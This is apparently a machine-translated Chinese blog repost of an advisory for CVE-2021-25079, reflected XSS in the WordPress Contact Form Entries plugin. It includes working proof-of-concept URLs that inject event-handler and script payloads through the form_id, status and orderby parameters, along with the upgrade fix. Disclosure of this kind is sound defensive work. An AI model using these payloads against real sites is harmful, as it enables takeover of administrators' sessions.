当前位置:网站首页>WordPress contact form entries cross cross site scripting attack
WordPress contact form entries cross cross site scripting attack
2022-06-23 06:03:00 【Khan security team】
edition : < 1.2.4
CVE : CVE-2021-25079
Reference resources :
https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/
vxcf_leads Several parameters of the administrator page are vulnerable to reflection cross site scripting vulnerability .
GET /wp-admin/ admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+
Returns the list of saved entries in the database . form_id Value reflected in < form_id Parameters are not filtered , So you can inject any value .
http://example.com/wp-admin /admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
Allow to inject... Into the input form onmouseover
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>
By means of click Move the mouse inside the element , Vulnerability triggered . Even though the vulnerability seems to require the user to move the mouse over the input element , You can also inject a “ style ” Part to improve the attack , This section can extend input elements with large width and height . such , When the user clicks on the link , Will execute javascript Code . status Parameters are vulnerable to the most dangerous XSS attack : Just send the following request
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
Will perform XSS Loophole . order、orderby and search Parameters are also susceptible to XSS attack :
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt
resolvent : Upgrade contact table entries to version 1.2.4
边栏推荐
- Pat class B 1023 minimum decimals
- Pat class B 1016 C language
- PAT 乙等 1026 程序运行时间
- ORB_ Slam2 operation
- jvm-06. Garbage collector
- MDM data cleaning function development description
- Ant Usage Summary (II): description of related commands
- node中操作mongoDB
- PAT 乙等 1022 D进制的A+B
- How to specify the output path of pig register Project Log
猜你喜欢
android Handler内存泄露 kotlin内存泄露处理
jvm-01. Instruction rearrangement
True MySQL interview question (XXII) -- condition screening and grouping screening after table connection
Centos7 deploy radius service -freeradius-3.0.13-15 EL7 integrating MySQL
Wireshark TS | 视频 APP 无法播放问题
gplearn出现 assignment destination is read-only
iNFTnews | 加密之家从宇宙寄来的明信片,你会收到哪一张?
Three most advanced certifications, two innovative technologies and two outstanding cases, Alibaba cloud appeared at the cloud native industry conference
雷达图canvas
最优传输理论下对抗攻击可解释性
随机推荐
PAT 乙等 1010 C语言
ant使用总结(一):使用ant自动打包apk
jvm-01.指令重排
Operating mongodb in node
PAT 乙等 1019 C语言
Leetcode topic analysis: factorial training zeroes
Huawei's software and hardware ecosystem has taken shape, fundamentally changing the leading position of the United States in the software and hardware system
Pat class B 1018 C language
[open source project] excel export Lua configuration table tool
jvm-06. Garbage collector
Pat class B 1024 scientific notation C language
Oracle exception
Real MySQL interview questions (25) -- common group comparison scenarios
Redis cache penetration solution - bloom filter
PAT 乙等 1018 C语言
Centos7部署radius服务-freeradius-3.0.13-15.el7集成mysql
【数据库备份】通过定时任务完成MySQL数据库的备份
pyinstaller 打包exe设置图标不显示
数字藏品到底有什么魔力?目前有哪些靠谱的团队在开发
PAT 乙等 1012 C语言